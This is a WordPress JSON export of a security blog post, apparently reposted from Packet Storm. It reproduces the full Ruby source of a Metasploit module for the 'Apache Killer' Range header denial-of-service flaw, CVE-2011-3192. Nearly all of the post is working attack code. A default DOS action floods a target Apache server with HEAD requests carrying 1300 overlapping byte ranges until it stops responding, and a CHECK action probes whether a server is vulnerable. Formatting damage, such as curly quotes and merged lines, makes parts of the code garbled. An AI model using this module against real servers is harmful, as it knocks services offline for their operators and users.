{"id":59278,"date":"2024-08-31T21:19:57","date_gmt":"2024-08-31T18:19:57","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180517\/apache_range_dos.rb.txt"},"modified":"2024-08-31T21:19:57","modified_gmt":"2024-08-31T18:19:57","slug":"apache-range-header-denial-of-service-apache-killer","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/apache-range-header-denial-of-service-apache-killer\/","title":{"rendered":"Apache Range Header Denial of Service (Apache Killer)"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::Dos<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Apache Range Header DoS (Apache Killer)’,
‘Description’ => %q{
The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x
through 2.2.19 allows remote attackers to cause a denial of service (memory and
CPU consumption) via a Range header that expresses multiple overlapping ranges,
exploit called “Apache Killer”
},
‘Author’ =>
[
‘Kingcope’, #original discoverer
‘Masashi Fujiwara’, #metasploit module
‘Markus Neis <markus.neis[at]gmail.com>’ # check for vulnerability
],
‘License’ => MSF_LICENSE,
‘Actions’ =>
[
[‘DOS’, ‘Description’ => ‘Trigger Denial of Service against target’],
[‘CHECK’, ‘Description’ => ‘Check if target is vulnerable’]],
‘DefaultAction’ => ‘DOS’,
‘References’ =>
[
[ ‘BID’, ‘49303’],
[ ‘CVE’, ‘2011-3192’],
[ ‘EDB’, ‘17696’],
[ ‘OSVDB’, ‘74721’ ],
],
‘DisclosureDate’ => ‘2011-08-19’
))<\/p>\n

register_options(
[
Opt::RPORT(80),
OptString.new(‘URI’, [ true, “The request URI”, ‘\/’]),
OptInt.new(‘RLIMIT’, [ true, “Number of requests to send”,50])
])
end<\/p>\n

def run_host(ip)<\/p>\n

case action.name
when ‘DOS’
conduct_dos()<\/p>\n

when ‘CHECK’
check_for_dos()
end<\/p>\n

end<\/p>\n

def check_for_dos()
uri = datastore[‘URI’]rhost = datastore[‘RHOST’]begin
res = send_request_cgi({
‘uri’ => uri,
‘method’ => ‘HEAD’,
‘headers’ => {
“HOST” => rhost,
“Range” => “bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10”,
“Request-Range” => “bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10”
}
})<\/p>\n

if (res and res.code == 206)
print_status(“Response was #{res.code}”)
print_status(“Found Byte-Range Header DOS at #{uri}”)<\/p>\n

report_note(
:host => rhost,
:port => rport,
:type => ‘apache.killer’,
:data => “Apache Byte-Range DOS at #{uri}”
)<\/p>\n

else
print_status(“#{rhost} doesn’t seem to be vulnerable at #{uri}”)
end<\/p>\n

rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end<\/p>\n

def conduct_dos()
uri = datastore[‘URI’]rhost = datastore[‘RHOST’]ranges = ”
for i in (0..1299) do
ranges += “,5-” + i.to_s
end
for x in 1..datastore[‘RLIMIT’]begin
print_status(“Sending DoS packet #{x} to #{rhost}:#{rport}”)
res = send_request_cgi({
‘uri’ => uri,
‘method’ => ‘HEAD’,
‘headers’ => {
“HOST” => rhost,
“Range” => “bytes=0-#{ranges}”,
“Request-Range” => “bytes=0-#{ranges}”}},1)<\/p>\n

rescue ::Rex::ConnectionRefused
print_error(“Unable to connect to #{rhost}:#{rport}”)
rescue ::Errno::ECONNRESET
print_good(“DoS packet successful. #{rhost} not responding.”)
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error(“Couldn’t connect to #{rhost}:#{rport}”)
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Dos def initialize(info = {})super(update_info(info,‘Name’ => ‘Apache Range Header DoS (Apache Killer)’,‘Description’ => %q{The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.xthrough 2.2.19 allows remote attackers to cause a denial of service (memory andCPU consumption) …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59278","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59278"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59278\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}